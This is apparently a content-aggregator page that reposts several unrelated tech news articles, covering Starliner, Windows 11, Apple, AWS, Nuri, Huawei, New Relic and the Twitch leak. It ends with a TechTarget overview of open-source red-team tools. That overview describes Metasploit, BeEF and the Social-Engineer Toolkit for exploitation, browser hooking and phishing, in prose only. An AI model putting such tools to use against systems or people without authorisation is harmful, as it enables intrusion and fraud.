Boeing’s Starliner capsule corroded due to high humidity levels, NASA explains, and the spaceship won’t fly this year – The Register

Boeings CST-100 Starliner capsule, designed to carry astronauts to and from the International Space Station, will not fly until the first half of next year at the earliest, as the manufacturing giant continues to tackle an issue with the spacecrafts valves.

Things have not gone smoothly for Boeing. Its Starliner program has suffered numerous setbacks and delays. Just in August, a second unmanned test flight was scrapped after 13 of 24 valves in the spacecrafts propulsion system jammed. In a briefing this week, Michelle Parker, chief engineer of space and launch at Boeing, shed more light on the errant components.

Boeing believes the valves malfunctioned due to weather issues, we were told. Florida, home to NASAs Kennedy Space Center where the Starliner is being assembled and tested, is known for hot, humid summers. Parker explained that the chemicals from the spacecrafts oxidizer reacted with water condensation inside the valves to form nitric acid. The acidity corroded the valves, causing them to stick.

Engineers managed to free nine out of 13 faulty valves, but four remained stuck. The capsule was returned to the factory and two valves have been removed and handed to NASA for further analysis, with a third on the way. Boeing said will not resume flight tests of its CST-100 Starliner module until the first half of next year.

NASA astronauts Nicole Mann and Josh Cassada, who were expected to fly aboard Boeing's first official crewed flight for its Starliner-1 mission, will now hitch a ride to the ISS as part of Crew-5, a SpaceX mission in the second half of 2022.

NASA decided it was important to make these reassignments to allow Boeing time to complete the development of Starliner," the US agency previously said, "while continuing plans for astronauts to gain spaceflight experience for the future needs of the agencys missions."

Veteran astronauts Butch Wilmore and Mike Fincke have still been assigned to fly on Starliner. An official date hasn't been set for their launch and this will depend on whether Boeing has managed to fix its valve issue and has successfully pulled off an uncrewed orbital test flight and other NASA-mandated checks.

The rest is here:

Boeing's Starliner capsule corroded due to high humidity levels, NASA explains, and the spaceship won't fly this year - The Register

Microsoft emits more Win 11 fixes for AMD speed issues and death by PowerShell bug – The Register

Microsoft has released a build of Windows 11 that it claims addresses performance problems the new OS imposed on some systems.

Redmond's announcement of OS Build 22000.282 lists over 60 "improvements and fixes" on top of a lucky 13 "highlights".

One of those highlights is described as fixing "an issue that causes some applications to run slower than usual after you upgrade to Windows 11 (original release)".

Another addresses an issue that could cause Bluetooth mice and keyboards "to respond slower than expected". A third "improves the time estimate for how long you might wait to use your device after it restarts".

Some of the improvements and fixes offer meatier fare among them addressing "an L3 caching issue that might affect performance in some applications on devices that have AMD Ryzen processors after upgrading to Windows 11 (original release)".

AMD users have, quite reasonably, been rather miffed at being singled out, and more miffed still that their concerns weren't addressed in the first bundle of Win 11 fixes issued last week.

Another fix prevents PowerShell from eating a PC alive by creating an infinite number of child directories. "This issue occurs when you use the PowerShell Move-Item command to move a directory to one of its children. As a result, the volume fills up and the system stops responding," Microsoft explained.

If Server Manager has disappeared while you use Windows 11, Microsoft has found the cause for its absence: silly you, for installing Server Manager using the Remote Server Administration Tools and then using it to remove some features from Hyper-V.

Distorted fonts for Asian alphabets have been clarified, Microsoft Office has been restored to operability after Windows Defender Exploit Protection prevented it from running "on machines that have certain processors," and an issue that could prevent successful printer installation with Internet Printing Protocol has been erased.

Microsoft's Windows teams appear to be rather busy. On the same day as the new Windows 11 fixes were delivered, the IT giant also announced the all-butpicked cut of Windows 10 it will use for the Windows 10 November 2021 update.

"We believe that Build 19044.1288 is the final build for the November 2021 Update," wrote Brandon LeBlanc, a senior manager on the Windows Insider Program.

Insiders can get their hands on the November update in the Release Preview Channel on Windows 10 via Microsoft's "seeker" experience in Windows Update.

"This means Insiders currently on Windows 10, version 21H1 (or lower) in the Release Preview Channel will need to go to Settings > Update & Security > Windows Update and choose to download and install Windows 10, version 21H2," LeBlanc explained.

Microsoft previously teased a modest set of additions to Windows 10 in this update, headlined by Wi-Fi security improvements and GPU compute support in the Windows Subsystem for Linux (WSL) and Azure IoT Edge for Linux on Windows (EFLOW) environments.

Another major feature the 'softies previously promised would appear in the update a Windows Hello for Business deployment method called "cloud trust" has dropped out of the release.

LeBlanc described it as "still under development" and now due to appear "in a future monthly update to the November 2021 Update".

We will provide more information as this feature gets closer to availability. Information on exactly when the 21H2 update will make its mainstream debut is also in the "coming-real-soon-now-we-promise" bucket.

Original post:

Microsoft emits more Win 11 fixes for AMD speed issues and death by PowerShell bug - The Register

Unvaccinated and working at Apple? Prepare for COVID-19 testing ‘every time’ you step in the office – The Register

Apple will require unvaccinated workers to get tested for COVID-19 every time they come into the office for work, starting from November 1.

Employees have been told to declare whether theyve been vaccinated or not by October 24, Bloomberg reported this week. Staff who choose not to disclose their vaccination status will be subjected to COVID-19 testing whenever they enter the office, it's said.

The iGiant has again and again pushed back the date it wants its staff to return to their desks as the coronavirus continues romping around the planet. Although it hoped workers could go back to their campuses this autumn, now the plan is to get them working at least three days a week at their office desks from some time in January 2022.

So far this concerns office workers. The rules are a little different for people manning the Apple Stores. Many have already returned to the physical retail shops, and those that remain unvaccinated will be required to be tested for COVID-19 twice a week.

Rapid do-it-yourself test kits will be made available for employees in Apple offices and retail stores, and, of course, there's an app for that, on which staff will self-report their status.

Apples latest safety protocols to tackle the bio-nasty fall short of forcing a vaccine mandate on all employees. Other tech companies have been more stringent. Google, Facebook, and IBM, for example, have made it clear staff must be fully vaccinated before they can go back their work campuses.

Big Blue is more hardcore, and has said it would suspend employees with no pay if they choose to remain unvaccinated from December 9, regardless of whether theyre continuing to work from home or not. IBM said it has to follow rules set by President Joe Biden, who signed an executive order that stated federal contractors and subcontractors must be vaccinated.

The Register has asked Apple for comment.

Follow this link:

Unvaccinated and working at Apple? Prepare for COVID-19 testing 'every time' you step in the office - The Register

No swearing or off-brand comments: AWS touts auto-moderation messaging API – The Register

AWS has introduced channel flows to its Chime messaging and videoconferencing API, the idea being to enable automatic moderation of profanity or content that "does not fit" the corporate brand.

Although Amazon Chime has a relatively small market share in the crowded videoconferencing market, the Chime SDK is convenient for developers building applications that include videoconferencing or messaging, competing with SDKs and services from the likes of Twilio or Microsoft's Azure Communication Services. In other words, this is aimed mainly at corporate developers building applications or websites that include real-time messaging, audio or videoconferencing.

The new feature is for real-time text chat rather than video and is called messaging channel flows. It enables developers to create code that intercepts and processes messaging before they are delivered. The assumption is that this processing code will run on AWS Lambda, its serverless platform.

A post by Chime software engineer Manasi Surve explains the thinking behind the feature in more detail. It is all about moderation, and Surve describes how to "configure a channel flow that removes profanity and certain personally identifiable information (PII) such as a social security number."

She further explains that corporations need to prevent accidental sharing of sensitive information, and that social applications need to "enforce community guidelines" as well as avoiding "content shared by users that does not fit their brand." A previous approach to the same problem worked only after the message had been posted too late in many scenarios.

It is telling that Surve observes that "human moderation requires significant human effort and does not scale."

Automate everything is a defining characteristic of today's cloud giants, even though moderation automation has not always been successful.

Surve said: "Amazon Comprehend helps remove many of the challenges," this service being for natural language processing and having the ability, when suitably trained, to detect "key phrases, entities and sentiment" to automate further actions.

The simple example presented by Surve does not use Comprehend for profanity but "simply a banned word list," though she adds that "you can also use Comprehend for profanity, but you will need to train your own model." Comprehend is used for detecting a social security number.

Users are skilled in getting around automated filters and we suspect that training Comprehend to sanitise every kind of profanity or off-brand message a user could devise will be challenging.

There are other possible use cases for message flows for example, looking up a support article automatically in order to show the user a link, sending an alert, or analysing sentiment though in these cases it may not matter so much whether the processing takes place before or after a message is sent to others in the same channel.

Visit link:

No swearing or off-brand comments: AWS touts auto-moderation messaging API - The Register

After more than a decade of development, South Korea has a near miss with Nuri rocket test – The Register

South Korea today came close to joining the small club of nations that can build and launch their own orbital-class rockets, with its maiden attempt blasting off successfully then failing to deploy its payload.

At 5pm local time (UTC+9), the rocket, named Nuri, or KSLV-II, left its launchpad at Naro Space Center, destined for low-Earth orbit with a 1.5-ton dummy payload. But while all the three stages of the Korea Space Launch Vehicle II worked and the initial payload separation was fine, the dummy satellite was not placed into orbit as planned.

It wasn't immediately clear what went wrong, although South Korean President Moon Jae-in, speaking from the Naro spaceport, said the payload did not stabilize in orbit after separation. It appears the rocket's third-stage engine stopping running after 475 seconds, about 50 seconds earlier than planned, leading to the failed deployment.

According to Reuters, Moon said of the partly failed test: "It's not long before we'll be able to launch it exactly into the target trajectory."

The mission was scheduled for 4pm local time, and delayed an hour to allow for a valve and wind check. Korea Aerospace Research Institute (KARI) had pegged the mission's success rate at 30 per cent.

South Korea would have been the seventh nation to launch its own rocket carrying over a tonne of payload into space, following in the footsteps of Russia, US, France, China, Japan, and India.

The launch represents 11 years of work by the likes of KARI and approximately 300 private companies. In 2013, Korea launched its first space rocket, Naro or KSLV-I, with some help from Russian technology but experienced several delays and two failed launches before eventually succeeding.

South Korea has been behind on its space endeavors, partly due to a 1979 Cold War-era agreement with the US that limited the country's ability develop and test ballistic missiles of significant range. Those restrictions were amended in 2020, making South Korea free to use solid rocket motors without restrictions and enabling a space program.

Meanwhile, countries like China and Japan have developed their own space programs, leaving some catching up to do for South Korea in both military and civilian capacities.

A successful program could help South Korea get a foothold in 6G and keep tabs on North Korea, which has a military nuclear weapons program. South Korea does not, although politicians and officials have pushed for one and even implied in the past that Nuri could be a nuclear weapon precursor.

The three-stage rocket consists of about 370,000 parts, is just over 47 metres long, and has six liquid-fueled engines.

The first stage uses four clustered 75-ton engines and separates at 50km altitude. The second stage uses a single 75-ton engine that separates at 240km. The third stage uses a seven-ton engine to take the payload to its final destination of an orbit between 600 and 800km.

By May 2022, KARI planned to follow up the endeavour by sending a 200kg satellite into low-earth orbit. A lunar orbiter is slated for August 2022 with hopes to send a spaceship to the Moon by 2030.

See the rest here:

After more than a decade of development, South Korea has a near miss with Nuri rocket test - The Register

Huawei appears to have quenched its thirst for power in favour of more efficient 5G – The Register

MBB Forum 2021 The "G" in 5G stands for Green, if the hours of keynotes at the Mobile Broadband Forum in Dubai are to be believed.

Run by Huawei, the forum was a mixture of in-person event and talking heads over occasionally grainy video and kicked off with an admission by Ken Hu, rotating chairman of the Shenzhen-based electronics giant, that the adoption of 5G with its promise of faster speeds, higher bandwidth and lower latency was still quite low for some applications.

Despite the dream five years ago, that the tech would link up everything, "we have not connected all things," Hu said.

Click to enlarge

It was a refreshingly frank assessment, sandwiched between the usual cheerleading for 5G. A distinct change of tack could be detected from the normal trumpeting of raw performance to an acknowledgement that power consumption would need to be reduced amid concerns about efficiency.

On that note, we'll draw a veil over the fact that the event's host Dubai features an indoor ski slope on the edge of a desert.

Hu ticked off a shopping list of things that hadn't quite happened in the 5G world just yet there are now 10,000 "5GtoB" projects in the world, but more than half are in China and industry has yet to see its promised redefinition. 5GtoB is Huawei's B2B 5G services punt, which includes a network, a NaaS offering, a 5G app engine, and a marketplace.

There had been great hopes for virtual reality and 360 broadcasting, but neither had taken off. And so it went on.

That said, Hu also noted faster-than-expected growth in some areas, claiming over 1.5 million base stations and 176 commercial 5G networks were up and running along with more than half a billion 5G users (smartphone users and industry modules).

Hu also reckoned plenty of opportunities lay ahead. The pandemic had accelerated digital transformation by approximately seven years, he said, and consumers had hopped online and were voraciously consuming services such as video streaming. As well as the increasing trend toward cloud applications, there was a demand for decent wireless home broadband.

Fertile ground for 5G and 5.5G, for sure.

Getting latency down to 10ms and upping the bandwidth are key said Hu as he wheeled out the industry buzzword of the moment: the metaverse. After all, if AR and VR haven't taken off as hoped, there is always extended reality or XR.

And then there is a growing awareness among the population that perhaps shoving yet more power-hungry gizmos into data centres might not be the best approach. But hey Huawei has just the 5G (and 5.5G) and networking tech for that, assuming you live in a country that hasn't banned its tech.

"We can't do anything about that," a spokesperson told The Register with a hint of a smile.

Huawei's kit is famously being pulled out of UK networks amid mistrust of the Chinese government, although it continues to install its telecommunications technology elsewhere. As well as telco representatives from the Middle East, the likes of Vodafone turned up via video link to extol the virtues of 5G.

Konstantinos Masselos, President of Greece's Hellenic Telecommunications & Post Commission, spoke in person about spectrum strategy, even as the backdrop behind him strobed like a ZX Spectrum loading screen.

Naturally, Huawei was keen to show off its other toys. The AR and XR department was taken care of by a display showing a customer garbed in virtual traditional attire thanks to a Azure Kinect DK camera and a big screen. An electric car was also on show, hoped to be a showcase for Huawei's dream of a connected automobile world, but sadly lacking the battery thanks to problems getting the units shipped into the UAE. There's perhaps a metaphor in there somewhere

5G technology is critical for Huawei as the company faces sanctions around the world. The banhammer was dropped in the UK last year, prohibiting telcos from purchasing its kit and removing what had already been installed by 2027. US sanctions have played a role in a decline in the company's revenues as components have become difficult to source for products such as smartphones. That said, back in August, rotating chairman Eric Xu remained bullish about the company's enterprise and carrier business (excluding the likes of the UK, of course).

While some countries might regard Huawei with some suspicion, others appear more than happy to fit out data centres with its tech poor firmware engineering processes or not.

Overall, the theme of the 2021 Mobile Broadband Forum was a recognition that the world had changed in the last two years. Raw performance seemed to take a back seat to the potential for power savings and efficiency improvements as old kit gradually gets replaced with new over the coming years.

While XR might seem a contender for next year's hypewagon, a renewed emphasis on industry applications and standards for 5G seems a good deal more realistic.

The Register attended MBBF 2021 as a guest of Huawei.

Visit link:

Huawei appears to have quenched its thirst for power in favour of more efficient 5G - The Register

New Relic CodeStream plugs observability directly into developer workflows in the IDE – Diginomica

(New Relic CodeStream screenshot)

New Relic yesterday brought observability directly into developer workflows with the acquisition of CodeStream, a collaboration tool that sits inside popular Integrated Development Environments (IDEs) and also integrates to a range of other tools, from GitHub to Jira and Slack. A new version of CodeStream that integrates with the New Relic One observability platform is able to surface application telemetry data directly within the IDE at the relevant point in the code, so that developers can instantly get to work on resolving issues. We spoke to Peter Pezaris, CodeStream CEO and Founder, and Buddy Brewer, GVP and GM, New Relic, to find out more about the news.

The company believes the new product, along with a new pricing tier, will broaden New Relic's appeal among developers whose primary role is coding, rather than the traditional users of monitoring and observability tools, who focus on operational uptime and reliability. Customers will also get extra value from their investment in collecting and analyzing telemetry data, as Brewer explains:

Especially with the shift to cloud, and decomposing monoliths into the containerization of software, there is so much telemetry out there, that it's a massive investment that companies are making. The value of that investment can extend so much further than just utilizing that data when the software is on fire ...

By bringing that telemetry data into the IDE I think there's like 14 IDEs that are supported by CodeStream you can incorporate this data into your IDE. It allows those developers to access that data when they're planning and they're building software, not just when they're running it. We think that'll help them get a lot more value out of the investment in telemetry and also help them build better software.

One of the most compelling examples of how the newly integrated product blurs the line between building code and running it in production is the integration with New Relic Errors Inbox. This recently introduced and already popular capability provides a single location for viewing and dealing with errors from anywhere across the application stack, with the ability to see detail down into the stack trace. But as Pezaris points out, for all its convenience, what do you do then? There's a button to copy the stack trace to a clipboard, but it's up to you to then work out where to go next. Whereas with the integration to CodeStream, all of those next steps are automatically done for you. He explains:

Now you'll be able to click on that stack trace, and you'll open it up right in your IDE. We'll check you out to the right repo. We'll open up the build SHA that was used to build that production artefact. And now that stack trace becomes clickable. So you can click through to all the stack frames, go right to the parts of the code where the problem's happened.

Because CodeStream's good at collaboration, every time you do that, we'll tell you who wrote that code. You can easily bring them into the conversation, swarm the issue between production and non-production engineers, and get to the root cause of the problem faster. We'll also keep track of who's been assigned which errors. So now every time you open up your IDE, you get to see all the errors that are assigned to you, so you can investigate and solve those problems.

Another feature uses integration to Pixie, the technology acquired by New Relic last year, which automatically collects telemetry data from deep inside application code running in Kubernetes clusters. With dynamic logging, a developer who wants to instrument a particular function in their source code to see how it's running in production, can invoke Pixie directly from their code editor to insert a probe and start logging straight away. Pezaris explains:

You can right-click on it and say, 'Start instrumenting that thing.' And then you will get feedback in real time in your editor, without having to do a deployment. You don't have to commit code, you don't have to change code, you don't have to push code. Just immediately, you'll start to get logging back for every call to that function.

As part of the announcement, New Relic highlighted its partnership with Microsoft around CodeStream, which works with the VS Code and Visual Studio IDEs, and also integrates to GitHub and Teams. Commenting in a joint press release, Scott Guthrie, Executive Vice President, Cloud + AI, Microsoft, welcomed the news of the acquisition, stating:

Tighter collaboration between development projects and improved connections between existing applications are just some of the benefits New Relic CodeStream will provide to the developer community.

To help encourage adoption, there will be a new Core user pricing option for New Relic One, starting at $49 per user per month, plus usage charges based on the volume of telemetry data. Developers can sign up for a free account for a preview period ending in January, after which some features will require a paid license.

Joining forces with CodeStream which is effectively a Disrupt for coders, but with a lot of the integration chops of a Slack built in too is a huge step up for New Relic in furthering its mission of data-driven software, which was a big theme of its FutureStack conference earlier this year. It helps to close the loop on ensuring that the people building software have as much access to telemetry about how it runs in production as those charged with running it. That can only improve quality and performance.

It's also a great illustration of why collaboration inside of the applications where people spend much of their working day is just as important and valuable as collaboration around them in applications such as Teams and Slack and highlights the value of integration that automates the futzing around that otherwise wastes people's time they move information from one place to another and put it in the right context to then get to work on it. When I write about Frictionless Enterprise, this is exactly the kind of thing I'm talking about.

Follow this link:

New Relic CodeStream plugs observability directly into developer workflows in the IDE - Diginomica

AWS admits cloud ain’t always the answer, intros on-prem vid-analysing box – The Register

Amazon Web Services, the outfit famous for pioneering pay-as-you-go cloud computing, has produced a bit of on-prem hardware that it will sell for a once-off fee.

The device is called the "AWS Panorama Appliance" and the cloud colossus describes it as a "computer vision (CV) appliance designed to be deployed on your network to analyze images provided by your on-premises cameras".

"AWS customers agree the cloud is the most convenient place to train computer vision models thanks to its virtually infinite access to storage and compute resources," states the AWS promo for the new box. But the post also admits that, for some, the cloud ain't the right place to do the job.

"There are a number of reasons for that: sometimes the facilities where the images are captured do not have enough bandwidth to send video feeds to the cloud, some use cases require very low latency," AWS's post states. Some users, it adds, "just want to keep their images on premises and not send them for analysis outside of their network".

Hence the introduction of the Panorama appliance, which is designed to ingest video from existing cameras and run machine learning models to do the classification, detection, and tracking of whatever your cameras capture.

Sometimes the facilities do not have enough bandwidth to send video feeds to the cloud

AWS imagines those ML models could well have been created in its cloud with SageMaker, and will charge you for cloud storage of the models if that's the case. The devices can otherwise run without touching the AWS cloud, although there is a charge of $8.33 per month per camera stream.

The appliance itself costs $4,000 up front.

Charging for hardware is not AWS's usual modus operandi. Its Outposts on-prem clouds are priced on a consumption model. The Snow range of on-prem storage and compute appliances are also rented rather than sold.

The Panorama appliance's specs page states that it contains Nvidia's Jetson Xavier AGX AI edge box, with 32GB RAM. The spec doesn't mention local storage, but lists a pair of gigabit ethernet ports, the same number of HDMI 2.0 slots, and two USB ports.

AWS announced the appliance at its re:invent gabfest in December 2020, when The Register opined that the cloudy concern may be taking a rare step into on-prem hardware, but by doing so would be eating the lunches of server-makers and video hardware specialists alike. Panorama turns out to not have quite the power to drive cloud services consumption as other Amazonian efforts, since the ML models it requires could come from SageMaker or other sources. That fact, and the very pre-cloud pricing scheme, mean the device could therefore be something of a watershed for AWS.

View post:

AWS admits cloud ain't always the answer, intros on-prem vid-analysing box - The Register

All of Twitch’s Source Code Was Just Leaked by Hackers – Interesting Engineering

1An anonymous hacker breached Twitch's source code, and posted more than 100GB in an online Torrent on Wednesday, according to an initial report from Video Games Chronicle that was later confirmed by Twitch.

And it's not just the source code that the hacker made open-source. The million-dollar payout details for top Twitch streamers were also leaked.

"We can confirm a breach has taken place," read a tweet from Twitchconfirming the hack as legitimate. "Our teams are working to understand the extent of this. We will update the community as soon as additional information is available. Thank you for bearing with us." A Fortnite streamer called "BBG Calc" said "The earnings list got my figure 100% correct," according to a BBC report on the breach. A different streamer also said the earnings listed in the leaked information were "accurate," and yet another person who spoke to BBC with close ties to a major influencer on the platform said the details included in the breach are "about right."

The documents detailing the sensitive financial information showed up on online forums with payment records stretching from August or September 2019 to October 2021, and some versions include streamers American Summit1g, Canadian xQC, the Dungeons & Dragons channel CriticalRole, and more. Twitch is renowned for its heavily-guarded operational mechanisms, and has touted the high-security features surrounding the figures paid to big-name streamers, which makes the breach especially sobering for the firm. And this leak comes while major rivals to Twitch in the media industry, like YouTube Gaming, are starting to offer colossal salaries for popular gaming streamers. In other words, this breach could cost Twitch some major sources of income.

Beyond salary information, the leaked documents also appear to contain the actual source code of Twitch, along with technical details of forthcoming products and platforms. Security experts speaking with Cyber Reporter Joe Tidy of BBC said the files also include internal server data, that is meant exclusively for Twitch employees. If all of this information really got out, this would constitute one of the biggest data leaks ever seen from a single company, with its most highly prized, cherished, and tightly-guarded information completely exposed to the world with a single hack.

Luckily for the major streamers, the list of payments included in the leaked information probably doesn't contain sponsorship deals, or other off-platform transactions, including accounts for taxes paid from streamers' income. It's also likely that most of the top-tier streamers are effectively their own large-scale media organization, with employees and contractors and independent business expenses, which means the final adjusted income after footing the bill for a streamer's entire business is probably not really clear from the leaked list. Included in the breached data are folders of data named after crucial Twitch software, like "core config packages", "infosec" (information security), and "devtools" (developer tools). This by no means spells absolute doom for Twitch, but it could significantly impact the firm's business plans, future website design, and, most obviously, its system security infrastructure.

This was a breaking story and was regularly updated as new information became available.

Excerpt from:

All of Twitch's Source Code Was Just Leaked by Hackers - Interesting Engineering

5 open source offensive security tools for red teaming – TechTarget

One of the harder cybersecurity areas to develop and maintain a skill base for is the red team. For those on the offense side of the security equation -- for example, penetration testers -- it can be challenging to establish an initial set of skills and keep them sharp over the long term.

Other than large companies, few organizations can afford full-time red teams. So, unless you're employed by a service provider such as a consultancy or MSSP that offers offense-based services to clients, there are few positions relative to defenders.

Offensive skills training is also somewhat niche as the skills taught are less directly applicable to blue teamers. Additionally, specialized training can be expensive. This translates into organizations being reluctant to hire and train someone as opposed to hiring someone with a fully developed skill base.

How then does someone looking into a red team career path build foundational skills? One way is to hone and maintain the skills associated with using offensive security tools. But which ones?

Here are five popular open source offensive security tools to consider. There are many great commercial tools out there, but these open source options are accessible to everyone. This enables cybersecurity professionals to start practicing and build up their skill base immediately.

One important caveat: Just as these tools can help build fundamental and necessary skills in a lawful and ethical manner, so too can they be used for unlawful, unethical purposes. The onus is on users to make sure that their usage is both lawful and ethical.

The Metasploit Framework provides a common, standardized interface to many services of interest to pen testers, researchers and red teams. It includes working with exploits and payloads, as well as auxiliary tasks that don't use a payload.

Vulnerability researchers historically wrote exploitation scripts or proof-of-concept code for exploits they discovered. This often lead to usability challenges because some scripts were minimally documented, included nonstandardized usage conventions or were unreliable when it came to using them as a test harness to validate issues. The Metasploit Framework helped remedy these issues.

Metasploit is the de facto standard interface for working with exploit code and payloads. It normalizes how red teams and pen testers interact with exploit code. From the red team's point of view, it streamlines work by providing important services such as payloads -- i.e., shellcode -- so the red team can focus on the vulnerability itself. For the tester, it likewise provides a standard way to interact so they can concentrate on the issue they're testing and not the minutia of running the exploit code itself.

To get started with Metasploit, try the companion Metasploitable project. It provides a deliberately weakened VM to test usage and build skills.

Offense involves more than just being able to run exploits. Particularly with web applications, it's important to be able to see and manipulate requests that occur between a browser and a web server. One category of tools that facilitate this are attack proxies. These tools sit between a browser and a remote web server so users can examine and even manipulate traffic between those devices. Likewise, attack proxies often contain automated mapping and crawling tools, automated website scanning tools and informational tools such as URL, hex and Base64 encoders and decoders.

The Zed Attack Proxy (ZAP) from OWASP is an attack proxy.

An attack proxy is great for exercising the functionality of a remote website, but what if you want to attack a given user more directly? For example, to test the resilience of users' browser habits or test whether they would notice warning signs of being part of an attack chain.

One way to do this is by using tools that hook one or more tabs within a target's browser and provide some level of control to an attacker. This in turn can be used as a forward "staging area" by an attacker to gain further traction within an environment or move laterally. The Browser Exploitation Framework (BeEF) enables red teams to do exactly that.

The Atomic Red Team project is a set of scripts that can be used to simulate attacker activity. The project provides a set of portable tests, each mapped to the Mitre ATT&CK framework, which can be used to exercise protections and hardening strategies in an organization.

Atomic Red Team is a useful tool for red and blue team members. For the blue team, it's a helpful way to validate the controls protecting the environment. On the offense side, deconstructing attack techniques can help red teams understand how those techniques work and how to apply them.

One often-overlooked area is testing the resilience of users against manipulation, coercion and trickery. The Social-Engineer Toolkit (SET) provides mechanisms to quickly create artifacts that might appear legitimate to a user and that can be used to test different scenarios. With it, red teams can send a legitimate-looking emails to target users, attempt a spear phishing attack containing malicious attachments and spoof SMS messages.

These five are a tiny subset of the many fantastic tools available. Some other offensive security tools to learn include Wireshark to help examine network activity and special-purpose tools like Mimikatz and Molehunt.

To dig beyond this list, look to pen testing-focused Linux distributions such as Kali, BlackArch or Parrot. These distributions pull together hundreds of specialized tools all in one place, which can help red teams learn which tools do what.

Go here to read the rest:

5 open source offensive security tools for red teaming - TechTarget